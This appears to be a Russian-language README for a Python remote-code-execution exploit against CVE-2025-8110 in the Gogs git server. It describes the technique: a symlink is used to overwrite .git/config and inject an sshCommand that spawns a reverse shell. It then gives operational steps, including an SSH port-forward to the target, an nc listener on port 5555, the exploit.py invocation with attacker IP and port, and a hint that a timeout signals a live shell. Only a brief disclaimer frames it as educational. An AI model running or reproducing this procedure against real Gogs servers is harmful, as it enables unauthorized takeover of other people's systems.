
Gogs CVE-2025-8110 RCE Exploit
Автоматизированный Python-эксплойт для CVE-2025-8110 в Gogs. Эта уязвимость позволяет выполнять удаленный код (RCE) путем злоупотребления API PutContents, который не проверяет, является ли путь к файлу символической ссылкой. Перезаписывая внутренний файл .git/config через символическую ссылку, мы можем внедрить вредоносную команду sshCommand, чтобы запустить обратную оболочку.
Убедитесь, что у вас установлен Python 3 и необходимые зависимости:
pip install requests rich beautifulsoup4
Также необходимо, чтобы git был установлен и доступен в вашем $PATH для этапов клонирования репозитория и создания коммитов.
Gogs может быть привязан к 127.0.0.1:3001. Используйте перенаправление портов для локального доступа к веб-интерфейсу:
ssh -L 3001:127.0.0.1:3001 user@target-ip
После перенаправления перейдите по адресу http://localhost:3001:
Скрипт использует API Gogs для доставки полезной нагрузки:
Запустите ваш слушатель перед выполнением скрипта, так как оболочка активируется сразу после обработки обновления API.
nc -lvnp 5555
Передайте ваши учетные данные и токен в качестве аргументов:
python3 exploit.py -u http://localhost:3001 -un <ВАШ_ПОЛЬЗОВАТЕЛЬ> -pw <ВАШ_ПАРОЛЬ> -t <ВАШ_ТОКЕН> -lh <ВАШ_IP> -lp 5555
| Флаг | Описание |
|---|---|
-u | Базовый URL экземпляра Gogs (например, http://localhost:3001). |
-un | Имя пользователя созданной учетной записи. |
-pw | Пароль созданной учетной записи. |
-t | API-токен, сгенерированный в Настройках. |
-lh | IP-адрес вашего слушателя (LHOST). |
-lp | Порт вашего слушателя (LPORT). |
Примечание: Если скрипт зависает или возвращает
Read timed outпосле "Overwriting .git/config", проверьте ваш слушатель. Обычно это означает, что обратная оболочка успешно подключилась и удерживает соединение.
Автор: TYehan
Отказ от ответственности: Этот инструмент предназначен только для образовательных целей и авторизованного аудита безопасности. Используйте ответственно.